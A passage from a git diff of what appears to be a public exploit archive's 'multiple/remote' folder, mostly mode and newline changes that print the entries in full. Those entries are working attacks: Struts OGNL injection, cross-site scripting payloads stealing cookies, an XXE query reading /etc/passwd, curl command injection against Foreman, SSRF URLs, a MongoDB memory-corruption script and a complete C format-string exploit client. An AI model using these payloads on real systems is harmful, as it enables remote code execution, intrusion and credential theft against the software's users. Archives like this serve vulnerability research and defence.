+%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())} \ No newline at end of file diff --git a/platforms/multiple/remote/37671.txt b/platforms/multiple/remote/37671.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/37851.txt b/platforms/multiple/remote/37851.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/37900.txt b/platforms/multiple/remote/37900.txt old mode 100755 new mode 100644 index cc6143a6d..bbad9a07f --- a/platforms/multiple/remote/37900.txt +++ b/platforms/multiple/remote/37900.txt @@ -10,4 +10,4 @@ http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:al http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B -http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua \ No newline at end of file +http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua \ No newline at end of file diff --git a/platforms/multiple/remote/37947.txt b/platforms/multiple/remote/37947.txt old mode 100755 new mode 100644 index 7f77d4d1a..83ce210ef --- a/platforms/multiple/remote/37947.txt +++ b/platforms/multiple/remote/37947.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow LiteSpeed Web Server 4.1.11 and prior versions are vulnerable. -http://www.exxample.com/service/graph_html.php?gtitle=VHOSTa%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file +http://www.exxample.com/service/graph_html.php?gtitle=VHOSTa%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/remote/38049.txt b/platforms/multiple/remote/38049.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/38179.txt b/platforms/multiple/remote/38179.txt old mode 100755 new mode 100644 index f16786411..8749caf3e --- a/platforms/multiple/remote/38179.txt +++ b/platforms/multiple/remote/38179.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow OpenManage Server Administrator 7.1.0.1 and prior versions are vulnerable. -https://www.example.com:1311/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm?topic="></iframe><iframe src="javascript:alert(/xss/) \ No newline at end of file +https://www.example.com:1311/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm?topic="></iframe><iframe src="javascript:alert(/xss/) \ No newline at end of file diff --git a/platforms/multiple/remote/38230.txt b/platforms/multiple/remote/38230.txt old mode 100755 new mode 100644 index f64d236a2..0a873003d --- a/platforms/multiple/remote/38230.txt +++ b/platforms/multiple/remote/38230.txt @@ -16,4 +16,4 @@ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3 Connection: keep-alive Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037 -Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002 \ No newline at end of file +Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002 \ No newline at end of file diff --git a/platforms/multiple/remote/38248.txt b/platforms/multiple/remote/38248.txt old mode 100755 new mode 100644 index 01c89356d..75d036015 --- a/platforms/multiple/remote/38248.txt +++ b/platforms/multiple/remote/38248.txt @@ -4,4 +4,4 @@ Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerab Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. -curl -v http://www.example.com/DVR.cfg | strings |grep -i USER \ No newline at end of file +curl -v http://www.example.com/DVR.cfg | strings |grep -i USER \ No newline at end of file diff --git a/platforms/multiple/remote/38250.html b/platforms/multiple/remote/38250.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/38313.html b/platforms/multiple/remote/38313.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/38368.txt b/platforms/multiple/remote/38368.txt old mode 100755 new mode 100644 index d59db0a21..5bbf3b325 --- a/platforms/multiple/remote/38368.txt +++ b/platforms/multiple/remote/38368.txt @@ -14,4 +14,4 @@ Host: 172.28.1.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) -Accept: */* \ No newline at end of file +Accept: */* \ No newline at end of file diff --git a/platforms/multiple/remote/38387.txt b/platforms/multiple/remote/38387.txt old mode 100755 new mode 100644 index aea9b3fd0..f06719010 --- a/platforms/multiple/remote/38387.txt +++ b/platforms/multiple/remote/38387.txt @@ -8,4 +8,4 @@ fastreader 1.0.8 is affected; other versions may also be vulnerable. The following example URI is available: -http://www.g;id;.com \ No newline at end of file +http://www.g;id;.com \ No newline at end of file diff --git a/platforms/multiple/remote/38412.txt b/platforms/multiple/remote/38412.txt old mode 100755 new mode 100644 index 5ace112ad..0b84257a9 --- a/platforms/multiple/remote/38412.txt +++ b/platforms/multiple/remote/38412.txt @@ -12,4 +12,4 @@ http://www.example.com/mail/x.nsf/WebInteriorCalendarFS?OpenFrameSet&Frame=Notes http://www.example.com/mail/x.nsf/ToDoFS?OpenFrameSet?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B -http://www.example.com/mail/x.nsf/WebInteriorToDoFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B \ No newline at end of file +http://www.example.com/mail/x.nsf/WebInteriorToDoFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B \ No newline at end of file diff --git a/platforms/multiple/remote/38521.c b/platforms/multiple/remote/38521.c old mode 100755 new mode 100644 index c643b56a6..363067c4f --- a/platforms/multiple/remote/38521.c +++ b/platforms/multiple/remote/38521.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/60004/info The RRDtool module for Python is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input. @@ -5,135 +6,136 @@ The RRDtool module for Python is prone to a format-string vulnerability because An attacker may exploit this issue to execute arbitrary code within the context of the affected application or to crash the application. RRDtool 1.4.7 is affected; other versions may also be vulnerable. +*/ - #include <stdio.h> - #include <errno.h> - #include <stdlib.h> - #include <unistd.h> - #include <sys/time.h> - #include <sys/types.h> - #include <sys/socket.h> - #include <netdb.h> - #include <netinet/in.h> - #include <stdarg.h> - #include <string.h> - #define DFLTHOST "www.example.com" - #define DFLTPORT 5501 - #define MAXMSG 256 - #define fgfsclose close - void init_sockaddr(struct sockaddr_in *name, const char *hostname, unsigned port); - int fgfswrite(int sock, char *msg, ...); - const char *fgfsread(int sock, int wait); - void fgfsflush(int sock); - int fgfswrite(int sock, char *msg, ...) - { - va_list va; - ssize_t len; - char buf[MAXMSG]; - va_start(va, msg); - vsnprintf(buf, MAXMSG - 2, msg, va); - va_end(va); - printf("SEND: \t<%s>\n", buf); - strcat(buf, "\015\012"); - len = write(sock, buf, strlen(buf)); - if (len < 0) { - perror("fgfswrite"); - exit(EXIT_FAILURE); - } - return len; +#include <stdio.h> +#include <errno.h> +#include <stdlib.h> +#include <unistd.h> +#include <sys/time.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netdb.h> +#include <netinet/in.h> +#include <stdarg.h> +#include <string.h> +#define DFLTHOST "www.example.com" +#define DFLTPORT 5501 +#define MAXMSG 256 +#define fgfsclose close +void init_sockaddr(struct sockaddr_in *name, const char *hostname, unsigned port); +int fgfswrite(int sock, char *msg, ...); +const char *fgfsread(int sock, int wait); +void fgfsflush(int sock); +int fgfswrite(int sock, char *msg, ...) +{ + va_list va; + ssize_t len; + char buf[MAXMSG]; + va_start(va, msg); + vsnprintf(buf, MAXMSG - 2, msg, va); + va_end(va); + printf("SEND: \t<%s>\n", buf); + strcat(buf, "\015\012"); + len = write(sock, buf, strlen(buf)); + if (len < 0) { + perror("fgfswrite"); + exit(EXIT_FAILURE); + } + return len; +} +const char *fgfsread(int sock, int timeout) +{ + static char buf[MAXMSG]; + char *p; + fd_set ready; + struct timeval tv; + ssize_t len; + FD_ZERO(&ready); + FD_SET(sock, &ready); + tv.tv_sec = timeout; + tv.tv_usec = 0; + if (!select(32, &ready, 0, 0, &tv)) + return NULL; + len = read(sock, buf, MAXMSG - 1); + if (len < 0) { + perror("fgfsread"); + exit(EXIT_FAILURE); + } + if (len == 0) + return NULL; + for (p = &buf[len - 1]; p >= buf; p--) + if (*p != '\015' && *p != '\012') + break; + *++p = '\0'; + return strlen(buf) ? buf : NULL; +} +void fgfsflush(int sock) +{ + const char *p; + while ((p = fgfsread(sock, 0)) != NULL) { + printf("IGNORE: \t<%s>\n", p); + } +} +int fgfsconnect(const char *hostname, const int port) +{ + struct sockaddr_in serv_addr; + struct hostent *hostinfo; + int sock; + sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); + if (sock < 0) { + perror("fgfsconnect/socket"); + return -1; + } + hostinfo = gethostbyname(hostname); + if (hostinfo == NULL) { + fprintf(stderr, "fgfsconnect: unknown host: \"%s\"\n", hostname); + close(sock); + return -2; + } + serv_addr.sin_family = AF_INET; + serv_addr.sin_port = htons(port); + serv_addr.sin_addr = *(struct in_addr *)hostinfo->h_addr; + if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) { + perror("fgfsconnect/connect"); + close(sock); + return -3; + } + return sock; +} +int main(int argc, char **argv) +{ + int sock; + unsigned port; + const char *hostname, *p; + int i; + hostname = argc > 1 ? argv[1] : DFLTHOST; + port = argc > 2 ? atoi(argv[2]) : DFLTPORT; + sock = fgfsconnect(hostname, port); + if (sock < 0) + return EXIT_FAILURE; + fgfswrite(sock, "data"); + fgfswrite(sock, "set /sim/rendering/clouds3d-enable true"); + fgfswrite(sock, "set /environment/clouds"); + for (i=0; i < 5; i++) { + fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cu/cloud/name %%n", i); + fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cb/cloud/name %%n", i); + fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ac/cloud/name %%n", i); + fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/st/cloud/name %%n", i); + fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ns/cloud/name %%n", i); } - const char *fgfsread(int sock, int timeout) - { - static char buf[MAXMSG]; - char *p; - fd_set ready; - struct timeval tv; - ssize_t len; - FD_ZERO(&ready); - FD_SET(sock, &ready); - tv.tv_sec = timeout; - tv.tv_usec = 0; - if (!select(32, &ready, 0, 0, &tv)) - return NULL; - len = read(sock, buf, MAXMSG - 1); - if (len < 0) { - perror("fgfsread"); - exit(EXIT_FAILURE); - } - if (len == 0) - return NULL; - for (p = &buf[len - 1]; p >= buf; p--) - if (*p != '\015' && *p != '\012') - break; - *++p = '\0'; - return strlen(buf) ? buf : NULL; + p = fgfsread(sock, 3); + if (p != NULL) + printf("READ: \t<%s>\n", p); + for (i=0; i < 5; i++) { + fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage scattered", i); + fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage cirrus", i); + fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage clear", i); } - void fgfsflush(int sock) - { - const char *p; - while ((p = fgfsread(sock, 0)) != NULL) { - printf("IGNORE: \t<%s>\n", p); - } - } - int fgfsconnect(const char *hostname, const int port) - { - struct sockaddr_in serv_addr; - struct hostent *hostinfo; - int sock; - sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); - if (sock < 0) { - perror("fgfsconnect/socket"); - return -1; - } - hostinfo = gethostbyname(hostname); - if (hostinfo == NULL) { - fprintf(stderr, "fgfsconnect: unknown host: \"%s\"\n", hostname); - close(sock); - return -2; - } - serv_addr.sin_family = AF_INET; - serv_addr.sin_port = htons(port); - serv_addr.sin_addr = *(struct in_addr *)hostinfo->h_addr; - if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) { - perror("fgfsconnect/connect"); - close(sock); - return -3; - } - return sock; - } - int main(int argc, char **argv) - { - int sock; - unsigned port; - const char *hostname, *p; - int i; - hostname = argc > 1 ? argv[1] : DFLTHOST; - port = argc > 2 ? atoi(argv[2]) : DFLTPORT; - sock = fgfsconnect(hostname, port); - if (sock < 0) - return EXIT_FAILURE; - fgfswrite(sock, "data"); - fgfswrite(sock, "set /sim/rendering/clouds3d-enable true"); - fgfswrite(sock, "set /environment/clouds"); - for (i=0; i < 5; i++) { - fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cu/cloud/name %%n", i); - fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cb/cloud/name %%n", i); - fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ac/cloud/name %%n", i); - fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/st/cloud/name %%n", i); - fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ns/cloud/name %%n", i); - } - p = fgfsread(sock, 3); - if (p != NULL) - printf("READ: \t<%s>\n", p); - for (i=0; i < 5; i++) { - fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage scattered", i); - fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage cirrus", i); - fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage clear", i); - } - p = fgfsread(sock, 3); - if (p != NULL) - printf("READ: \t<%s>\n", p); - fgfswrite(sock, "quit"); - fgfsclose(sock); - return EXIT_SUCCESS; - } \ No newline at end of file + p = fgfsread(sock, 3); + if (p != NULL) + printf("READ: \t<%s>\n", p); + fgfswrite(sock, "quit"); + fgfsclose(sock); + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/platforms/multiple/remote/38549.txt b/platforms/multiple/remote/38549.txt old mode 100755 new mode 100644 index ce98f2d70..ab4a8ce12 --- a/platforms/multiple/remote/38549.txt +++ b/platforms/multiple/remote/38549.txt @@ -8,4 +8,4 @@ Apache Struts 2.0.0 through versions 2.3.14.3 are vulnerable. http://www.example.com/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D -http://www.example.com/example/${#foo='Menu',#foo} \ No newline at end of file +http://www.example.com/example/${#foo='Menu',#foo} \ No newline at end of file diff --git a/platforms/multiple/remote/38587.txt b/platforms/multiple/remote/38587.txt old mode 100755 new mode 100644 index 3d8a6bc56..0e6ebb6bc --- a/platforms/multiple/remote/38587.txt +++ b/platforms/multiple/remote/38587.txt @@ -4,4 +4,4 @@ The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions, which may aid in launching further attacks -http://www.example.com/%2ftest/ \ No newline at end of file +http://www.example.com/%2ftest/ \ No newline at end of file diff --git a/platforms/multiple/remote/38597.txt b/platforms/multiple/remote/38597.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/38636.txt b/platforms/multiple/remote/38636.txt old mode 100755 new mode 100644 index d0121ddd1..ab494178b --- a/platforms/multiple/remote/38636.txt +++ b/platforms/multiple/remote/38636.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to gain access to sensitive information that Cryptocat 2.0.21 is vulnerable; other versions may also be affected. <img src="chrome-extension://[extension-id-from-chrome-web- -store]/img/keygen.gif" onload=alert(/hascat/) onerror=alert(/hasnot/) > \ No newline at end of file +store]/img/keygen.gif" onload=alert(/hascat/) onerror=alert(/hasnot/) > \ No newline at end of file diff --git a/platforms/multiple/remote/38637.txt b/platforms/multiple/remote/38637.txt old mode 100755 new mode 100644 index c14297c78..f76f6339b --- a/platforms/multiple/remote/38637.txt +++ b/platforms/multiple/remote/38637.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary script code within the c Versions prior to Cryptocat 2.0.22 are vulnerable. -Http://example.come/data:image/foo;base64,PGh0bWw+PGlmcmFtZSBzcmM9Imh0dHA6Ly9ldmlsLmNvbS8iPjwvaWZyYW1lPjwvaHRtbD4NCg \ No newline at end of file +Http://example.come/data:image/foo;base64,PGh0bWw+PGlmcmFtZSBzcmM9Imh0dHA6Ly9ldmlsLmNvbS8iPjwvaWZyYW1lPjwvaHRtbD4NCg \ No newline at end of file diff --git a/platforms/multiple/remote/38666.txt b/platforms/multiple/remote/38666.txt old mode 100755 new mode 100644 index 5446651bc..e72f99c58 --- a/platforms/multiple/remote/38666.txt +++ b/platforms/multiple/remote/38666.txt @@ -7,4 +7,4 @@ An attacker can leverage these issues by constructing a crafted URI and enticing Apache Struts 2.0.0 prior to 2.3.15.1 are vulnerable. http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/ -http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23 \ No newline at end of file +http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23 \ No newline at end of file diff --git a/platforms/multiple/remote/38669.txt b/platforms/multiple/remote/38669.txt old mode 100755 new mode 100644 index 827723e3a..24ef9b838 --- a/platforms/multiple/remote/38669.txt +++ b/platforms/multiple/remote/38669.txt @@ -10,4 +10,4 @@ use databaseMapped sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) } -db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")'); \ No newline at end of file +db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")'); \ No newline at end of file diff --git a/platforms/multiple/remote/38766.java b/platforms/multiple/remote/38766.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/38802.txt b/platforms/multiple/remote/38802.txt old mode 100755 new mode 100644 index 5649c1e7c..d9c9fd64c --- a/platforms/multiple/remote/38802.txt +++ b/platforms/multiple/remote/38802.txt @@ -11,4 +11,4 @@ GlassFish Server 2.1.1, 3.0.1, 3.1.2 JDeveloper 11.1.2.3.0, 11.1.2.4.0, 12.1.2.0.0 http://www.example.com/someApp/javax.faces.resource.../WEB-INF/web.xml.jsf -http://www.example.com/someApp/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. \ No newline at end of file +http://www.example.com/someApp/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. \ No newline at end of file diff --git a/platforms/multiple/remote/38805.txt b/platforms/multiple/remote/38805.txt old mode 100755 new mode 100644 index 1a5b47d73..5be64db06 --- a/platforms/multiple/remote/38805.txt +++ b/platforms/multiple/remote/38805.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to gain access to sensitive information; this SAP Sybase Adaptive Server Enterprise 15.7 ESD 2 is vulnerable; other versions may also be affected. -SELECT xmlextract('/', xmlparse('<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/passwd">]><content>&abc;</content>')) \ No newline at end of file +SELECT xmlextract('/', xmlparse('<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/passwd">]><content>&abc;</content>')) \ No newline at end of file diff --git a/platforms/multiple/remote/38812.txt b/platforms/multiple/remote/38812.txt old mode 100755 new mode 100644 index 48d0d0abe..37cb82a32 --- a/platforms/multiple/remote/38812.txt +++ b/platforms/multiple/remote/38812.txt @@ -4,4 +4,4 @@ DELL Quest One Password Manager is prone to a security bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and gain access to sensitive areas of the application to perform unauthorized actions; this may aid in launching further attacks. -ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cuser&Search=false \ No newline at end of file +ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cuser&Search=false \ No newline at end of file diff --git a/platforms/multiple/remote/38813.txt b/platforms/multiple/remote/38813.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/38818.xml b/platforms/multiple/remote/38818.xml old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/38825.xml b/platforms/multiple/remote/38825.xml old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/38845.txt b/platforms/multiple/remote/38845.txt old mode 100755 new mode 100644 index 4fe915db2..1cecaf2e8 --- a/platforms/multiple/remote/38845.txt +++ b/platforms/multiple/remote/38845.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary commands in the context SKIDATA Freemotion.Gate 4.1.3.5 is vulnerable; other versions may also be affected. -curl -X POST --header "Content-Type:text/xml" --data-binary @manual-release.raw http://www.example.com:7777/skidata/hessian/CP > /dev/null 2>&1 \ No newline at end of file +curl -X POST --header "Content-Type:text/xml" --data-binary @manual-release.raw http://www.example.com:7777/skidata/hessian/CP > /dev/null 2>&1 \ No newline at end of file diff --git a/platforms/multiple/remote/38846.txt b/platforms/multiple/remote/38846.txt old mode 100755 new mode 100644 index 16a441b9f..88cab5492 --- a/platforms/multiple/remote/38846.txt +++ b/platforms/multiple/remote/38846.txt @@ -8,4 +8,4 @@ nginx 0.8.41 through 1.5.6 are vulnerable. The following example data is available: -/file \0.php \ No newline at end of file +/file \0.php \ No newline at end of file diff --git a/platforms/multiple/remote/39018.txt b/platforms/multiple/remote/39018.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/39205.txt b/platforms/multiple/remote/39205.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/39222.txt b/platforms/multiple/remote/39222.txt old mode 100755 new mode 100644 index 25ec36cba..56b88168e --- a/platforms/multiple/remote/39222.txt +++ b/platforms/multiple/remote/39222.txt @@ -4,4 +4,4 @@ Foreman is prone to a remote command-injection vulnerability. Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy. -curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B' \ No newline at end of file +curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B' \ No newline at end of file diff --git a/platforms/multiple/remote/39258.txt b/platforms/multiple/remote/39258.txt old mode 100755 new mode 100644 index f6b4deccc..6ae4e3e42 --- a/platforms/multiple/remote/39258.txt +++ b/platforms/multiple/remote/39258.txt @@ -8,4 +8,4 @@ An attacker may leverage these issues to gain sensitive information or bypass ce Alfresco Community Edition 4.2.f and earlier are vulnerable. -http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port \ No newline at end of file +http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port \ No newline at end of file diff --git a/platforms/multiple/remote/39259.txt b/platforms/multiple/remote/39259.txt old mode 100755 new mode 100644 index 3038825e6..ce7396bce --- a/platforms/multiple/remote/39259.txt +++ b/platforms/multiple/remote/39259.txt @@ -8,4 +8,4 @@ An attacker may leverage these issues to gain sensitive information or bypass ce Alfresco Community Edition 4.2.f and earlier are vulnerable. -http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port \ No newline at end of file +http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port \ No newline at end of file diff --git a/platforms/multiple/remote/39295.js b/platforms/multiple/remote/39295.js old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/39318.txt b/platforms/multiple/remote/39318.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/39455.txt b/platforms/multiple/remote/39455.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/39631.txt b/platforms/multiple/remote/39631.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/39645.php b/platforms/multiple/remote/39645.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/40382.txt b/platforms/multiple/remote/40382.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/41740.txt b/platforms/multiple/remote/41740.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/41783.txt b/platforms/multiple/remote/41783.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/42303.txt b/platforms/multiple/remote/42303.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/42753.txt b/platforms/multiple/remote/42753.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/42885.rb b/platforms/multiple/remote/42885.rb index 6a1c65947..28cca6217 100755 --- a/platforms/multiple/remote/42885.rb +++ b/platforms/multiple/remote/42885.rb @@ -181,5 +181,4 @@ james@bloop:~/.msf4/loot$ cat 20170927110456_default_192.168.1.2_laquis.file_677 # localhost name resolution is handled within DNS itself. # -# - +# \ No newline at end of file diff --git a/platforms/multiple/remote/42965.rb b/platforms/multiple/remote/42965.rb index 01c64929e..24f5c1e89 100755 --- a/platforms/multiple/remote/42965.rb +++ b/platforms/multiple/remote/42965.rb @@ -253,4 +253,4 @@ class MetasploitModule < Msf::Exploit::Remote end end end -end +end \ No newline at end of file diff --git a/platforms/multiple/remote/4391.c b/platforms/multiple/remote/4391.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/4399.html b/platforms/multiple/remote/4399.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/4556.txt b/platforms/multiple/remote/4556.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/4877.txt b/platforms/multiple/remote/4877.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/5215.txt b/platforms/multiple/remote/5215.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/5430.txt b/platforms/multiple/remote/5430.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/5534.txt b/platforms/multiple/remote/5534.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/5790.txt b/platforms/multiple/remote/5790.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/6130.c b/platforms/multiple/remote/6130.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/6229.txt b/platforms/multiple/remote/6229.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/6236.txt b/platforms/multiple/remote/6236.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/67.c b/platforms/multiple/remote/67.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/745.cgi b/platforms/multiple/remote/745.cgi old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/7760.php b/platforms/multiple/remote/7760.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/7781.txt b/platforms/multiple/remote/7781.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/8037.txt b/platforms/multiple/remote/8037.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/805.c b/platforms/multiple/remote/805.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/8097.txt b/platforms/multiple/remote/8097.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/8191.txt b/platforms/multiple/remote/8191.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/828.c b/platforms/multiple/remote/828.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/8458.txt b/platforms/multiple/remote/8458.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/86.c b/platforms/multiple/remote/86.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/8786.txt b/platforms/multiple/remote/8786.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/8907.txt b/platforms/multiple/remote/8907.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/9039.txt b/platforms/multiple/remote/9039.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/95.c b/platforms/multiple/remote/95.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/9651.txt b/platforms/multiple/remote/9651.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/9718.txt b/platforms/multiple/remote/9718.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/9829.txt b/platforms/multiple/remote/9829.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/9843.txt b/platforms/multiple/remote/9843.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/9993.txt b/platforms/multiple/remote/9993.txt old mode 100755 new mode 100644 index b831534d4..f6d55d432 --- a/platforms/multiple/remote/9993.txt +++ b/platforms/multiple/remote/9993.txt @@ -4,4 +4,4 @@ The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability be An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file +http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/remote/9994.txt b/platforms/multiple/remote/9994.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/9995.txt b/platforms/multiple/remote/9995.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/9997.txt b/platforms/multiple/remote/9997.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/shellcode/13465.c b/platforms/multiple/shellcode/13465.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/shellcode/13466.c b/platforms/multiple/shellcode/13466.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/shellcode/13467.c b/platforms/multiple/shellcode/13467.c old mode 100755 new mode 100644 diff --git 